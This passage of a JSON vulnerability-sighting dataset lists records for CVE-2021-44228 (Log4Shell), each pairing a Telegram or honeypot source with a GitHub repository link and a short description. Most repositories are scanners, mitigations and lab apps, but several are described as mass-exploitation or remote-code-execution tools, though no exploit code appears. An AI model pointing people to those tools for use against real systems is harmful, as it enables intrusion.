"exploited", "source": "https://t.me/GithubRedTeam/1065", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScanner to send specially crafted requests and catch callbacks of systems that are impacted by Log4J Log4Shell vulnerability (CVE-2021-44228)\nURL\uff1ahttps://github.com/hupe1980/scan4log4shell", "creation_timestamp": "2021-12-14T18:59:01.000000Z"}, {"uuid": "50b82e0b-a0e2-46a0-9b09-d812162b6185", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1085", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aNmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)\nURL\uff1ahttps://github.com/gitlab-de/log4j-resources", "creation_timestamp": "2021-12-15T11:48:02.000000Z"}, {"uuid": "003607b0-94a1-4c2e-b52c-4f5f05211823", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1092", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 demo webapp\nURL\uff1ahttps://github.com/MkTech-0-8YT3/CVE-2021-44228", "creation_timestamp": "2021-12-15T17:43:36.000000Z"}, {"uuid": "6e8977b2-a77c-48d8-bdd0-44a97bb7dc63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1091", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScans for Log4j versions effected by CVE-2021-44228\nURL\uff1ahttps://github.com/inettgmbh/checkmk-log4j-scanner", "creation_timestamp": "2021-12-15T17:05:13.000000Z"}, {"uuid": "73093cfc-2acc-4424-93a5-00f63dd7e8da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1100", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alog4j vulnerability wrapper scanner for CVE-2021-44228\nURL\uff1ahttps://github.com/dpomnean/log4j_scanner_wrapper", "creation_timestamp": "2021-12-16T04:24:46.000000Z"}, {"uuid": "7563e1c9-1d72-401c-8b47-f154f1e9677d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1099", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis script is used to perform a fast check if your server is possibly affected by CVE-2021-44228 (the log4j vulnerability).\nURL\uff1ahttps://github.com/rv4l3r3/log4v-vuln-check", "creation_timestamp": "2021-12-16T02:29:17.000000Z"}, {"uuid": "23d553c7-4866-4da0-8957-c1c75811b73a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1098", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alog4j (CVE-2021-44228) Spring-boot web application with vulnerabilities\nURL\uff1ahttps://github.com/Auddn/ITF-log4shell-vulnapp", "creation_timestamp": "2021-12-16T02:12:02.000000Z"}, {"uuid": "6c489b4f-c7fd-4a89-916b-daada3a192a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1104", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j\u6f0f\u6d1e\uff08CVE-2021-44228\uff09\u7684Burpsuite\u68c0\u6d4b\u63d2\u4ef6\nURL\uff1ahttps://github.com/snow0715/log4j-Scan-Burpsuite", "creation_timestamp": "2021-12-16T10:20:55.000000Z"}, {"uuid": "00f9bfe2-65f5-4a94-90b5-f545fdee592b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1161", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDetect and fix log4j log4shell vulnerability (CVE-2021-44228)\nURL\uff1ahttps://github.com/Nanitor/log4fix", "creation_timestamp": "2021-12-18T17:07:17.000000Z"}, {"uuid": "a6b3237b-76ef-4d73-8813-1a2cca6fd123", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-08)", "content": "", "creation_timestamp": "2026-04-08T00:00:00.000000Z"}, {"uuid": "455a3344-c679-492c-bbed-18b9e82ceb1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1160", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA fun activity using a packet capture file from the log4j exploit (CVE-2021-44228)\nURL\uff1ahttps://github.com/Apipia/log4j-pcap-activity", "creation_timestamp": "2021-12-18T16:11:20.000000Z"}, {"uuid": "dc7bce50-b63c-4612-aa2e-0dbf2fe51d8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1159", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDetect and fix log4j log4shell vulnerability (CVE-2021-44228)\nURL\uff1ahttps://github.com/dtact/divd-2021-00038--log4j-scanner", "creation_timestamp": "2021-12-18T14:02:47.000000Z"}, {"uuid": "e3d60518-07d5-492a-8c5b-aff89cf980d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1163", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis is a showcase how the Log4J vulnerability (CVE-2021-44228) could be explored. This code is safe to run, but understand what it does and how it works!\nURL\uff1ahttps://github.com/otaviokr/log4j-2021-vulnerability-study", "creation_timestamp": "2021-12-18T20:56:19.000000Z"}, {"uuid": "db558c85-f0c4-4174-a48e-9cc6cf2fc974", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1165", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSearches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances, including embedded (jar/war/zip) packaged ones.\nURL\uff1ahttps://github.com/HynekPetrak/log4shell_finder", "creation_timestamp": "2021-12-19T01:02:30.000000Z"}, {"uuid": "eebf311e-5410-4693-b5f8-397d0ece68ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1187", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScript en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota.\nURL\uff1ahttps://github.com/julian911015/Log4j---Scanner-and-Exploit", "creation_timestamp": "2021-12-20T15:24:25.000000Z"}, {"uuid": "2387d38c-39ad-4d33-bf7c-a637247b0df8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8396", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 \ud83d\udd27 Tool; log4jpwn: Demo for CVE-2021-44228\n\nhttps://github.com/leonjza/log4jpwn", "creation_timestamp": "2021-12-11T18:25:04.000000Z"}, {"uuid": "6cd9cd57-1f16-4e15-b504-3c1d19b57d1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/977", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 test demo\nURL\uff1ahttps://github.com/fireflyingup/log4j-poc", "creation_timestamp": "2021-12-12T15:14:52.000000Z"}, {"uuid": "e2f383be-1187-4adc-b1df-22a9405bdab3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/981", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aIP addresses exploiting recent log4j2 vulnerability CVE-2021-44228 \nURL\uff1ahttps://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228", "creation_timestamp": "2021-12-12T17:44:46.000000Z"}, {"uuid": "f8475aaa-3482-4330-b4d9-43fc587958db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/980", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSpring Boot Log4j - CVE-2021-44228 Docker Lab \nURL\uff1ahttps://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab", "creation_timestamp": "2021-12-12T16:59:15.000000Z"}, {"uuid": "1cee4582-9c0b-4faf-849f-3bd77c972bb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/989", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aTest locally an exploit for Log4J2's CVE-2021-44228 (Log4Shell)\nURL\uff1ahttps://github.com/sunnyvale-it/CVE-2021-44228-PoC", "creation_timestamp": "2021-12-12T23:44:59.000000Z"}, {"uuid": "37c8086f-d7b6-4afd-8045-6db2d627e9b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/988", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1apure pythonic python RCE for CVE-2021-44228 log4shell\nURL\uff1ahttps://github.com/dotPY-hax/log4py", "creation_timestamp": "2021-12-12T22:59:03.000000Z"}, {"uuid": "d66a0b3a-8fed-46df-84e6-ec1b4f3d2e14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/987", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aNmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)\nURL\uff1ahttps://github.com/Diverto/nse-log4shell", "creation_timestamp": "2021-12-12T22:54:56.000000Z"}, {"uuid": "979401f1-3efd-4e1d-9d08-e088f94d9a7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1016", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aMass Check Vulnerable Log4j CVE-2021-44228\nURL\uff1ahttps://github.com/justakazh/Log4j-CVE-2021-44228", "creation_timestamp": "2021-12-13T13:32:25.000000Z"}, {"uuid": "cab83e73-02f8-4c09-a3ef-39240383b003", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1006", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA lab for playing around with the Log4J CVE-2021-44228\nURL\uff1ahttps://github.com/tuyenee/Log4shell", "creation_timestamp": "2021-12-13T08:51:41.000000Z"}, {"uuid": "0f4295f2-b3ea-4026-8110-e65a09d312bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1005", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 \nURL\uff1ahttps://github.com/fullhunt/log4j-scan", "creation_timestamp": "2021-12-13T08:21:43.000000Z"}, {"uuid": "9198caa9-bfb2-4501-9779-2437df933d56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1004", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4J CVE-2021-44228 : Mitigation Cheat Sheet\nURL\uff1ahttps://github.com/thedevappsecguy/Log4J-CVE-2021-44228-Mitigation-Cheat-Sheet", "creation_timestamp": "2021-12-13T08:13:06.000000Z"}, {"uuid": "1e50201d-d791-4293-ad1c-5c3bde343070", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1019", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCheck if your server is vulnerable to the CVE-2021-44228. (node)\nURL\uff1ahttps://github.com/AdriDevelopsThings/check-log4j-vulnerability", "creation_timestamp": "2021-12-13T14:15:05.000000Z"}, {"uuid": "b01f0c8d-7a27-4e03-bed0-f5297642e378", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1018", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 on Podman\nURL\uff1ahttps://github.com/ahmad4fifz/CVE-2021-44228-podman", "creation_timestamp": "2021-12-13T13:41:00.000000Z"}, {"uuid": "bca26476-d811-45a7-af04-4ad6bfd20d92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1020", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSome tools to help mitigating Apache Log4j 2 CVE-2021-44228\nURL\uff1ahttps://github.com/madCdan/JndiLookup", "creation_timestamp": "2021-12-13T15:01:56.000000Z"}, {"uuid": "af4ec777-6f06-473e-a1af-43502a064c57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1027", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228\nURL\uff1ahttps://github.com/trevalkov/log4j2-prosecutor", "creation_timestamp": "2021-12-13T18:32:56.000000Z"}, {"uuid": "ea06ad51-a22c-4782-aa2d-0d2fbb150851", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1064", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aInternal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228\nURL\uff1ahttps://github.com/BinaryDefense/log4j-honeypot-flask", "creation_timestamp": "2021-12-14T18:21:18.000000Z"}, {"uuid": "9ea19866-8359-4caa-a07e-15b2c5bd146d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1063", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aRepo containing all info, scripts, etc. related to CVE-2021-44228\nURL\uff1ahttps://github.com/wortell/log4j", "creation_timestamp": "2021-12-14T15:43:59.000000Z"}, {"uuid": "7b0b655b-f781-4578-9331-192d8850fae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1073", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j CVE-2021-44228 finder and patcher\nURL\uff1ahttps://github.com/xsultan/log4jshield", "creation_timestamp": "2021-12-14T22:24:52.000000Z"}, {"uuid": "7023ef9f-d17f-4590-ae83-126ef7db8ed7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1072", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 Log4J multithreaded Mass Exploitation tool compatible with URL/IP lists.\nURL\uff1ahttps://github.com/razz0r/CVE-2021-44228-Mass-RCE", "creation_timestamp": "2021-12-14T22:20:45.000000Z"}, {"uuid": "8db0ade4-4ace-44e4-82ec-c1dd45fad7cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1071", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA Byte Buddy Java agent-based fix for CVE-2021-44228, the log4j 2.x \\\"JNDI LDAP\\\" vulnerability.\nURL\uff1ahttps://github.com/nccgroup/log4j-jndi-be-gone", "creation_timestamp": "2021-12-14T22:16:29.000000Z"}, {"uuid": "6a86b6d0-1f6c-49f0-b9a0-def52085e4cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1070", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA firewall reverse proxy for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks.\nURL\uff1ahttps://github.com/mufeedvh/log4jail", "creation_timestamp": "2021-12-14T21:30:05.000000Z"}, {"uuid": "677766f0-81cc-421a-b2e7-0c3c378f04e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1069", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSimple Spring Boot application vulnerable to CVE-2021-44228\nURL\uff1ahttps://github.com/guerzon/log4shellpoc", "creation_timestamp": "2021-12-14T20:31:51.000000Z"}, {"uuid": "50f1a64b-a7fd-4444-8814-360283d61939", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1078", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j2 jndi injection fuzz tool (CVE-2021-44228)\nURL\uff1ahttps://github.com/zhzyker/logmap", "creation_timestamp": "2021-12-15T03:00:16.000000Z"}, {"uuid": "d4b3033c-819a-4875-bc43-8497fd85d7fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1077", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScanning for CVE-2021-44228\nURL\uff1ahttps://github.com/dbzoo/log4j_scanner", "creation_timestamp": "2021-12-15T02:51:33.000000Z"}, {"uuid": "26baf7a0-2a7c-47cb-ab86-638118701942", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1076", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 Response Scripts\nURL\uff1ahttps://github.com/0xThiebaut/CVE-2021-44228", "creation_timestamp": "2021-12-15T00:35:44.000000Z"}, {"uuid": "2cf178b8-80b3-47d8-9f34-b4cc74e00971", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1079", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4J Updater Bash Script to automate the framework update process on numerous machines and prevent the CVE-2021-44228\nURL\uff1ahttps://github.com/VinniMarcon/Log4jUpdater", "creation_timestamp": "2021-12-15T04:12:28.000000Z"}, {"uuid": "8d480aa3-4e4c-43fa-bd72-040d7f8de582", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1015", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aMass recognition tool for CVE-2021-44228\nURL\uff1ahttps://github.com/VNYui/CVE-2021-44228", "creation_timestamp": "2021-12-13T13:28:09.000000Z"}, {"uuid": "ae7ffc49-64a0-42d5-9d77-78c6bf137520", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1014", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j CVE-2021-44228 (Re lte+CE sample)\nURL\uff1ahttps://github.com/manuel-alvarez-alvarez/log4j-cve-2021-44228", "creation_timestamp": "2021-12-13T13:11:12.000000Z"}, {"uuid": "24144e92-dec4-423a-af25-fd67b0f03d07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1023", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aFind Log4Shell CVE-2021-44228 on your system\nURL\uff1ahttps://github.com/claranet/ansible-role-log4shell", "creation_timestamp": "2021-12-13T17:17:19.000000Z"}, {"uuid": "1d544076-4c7e-44c1-93c7-853888d49bff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": 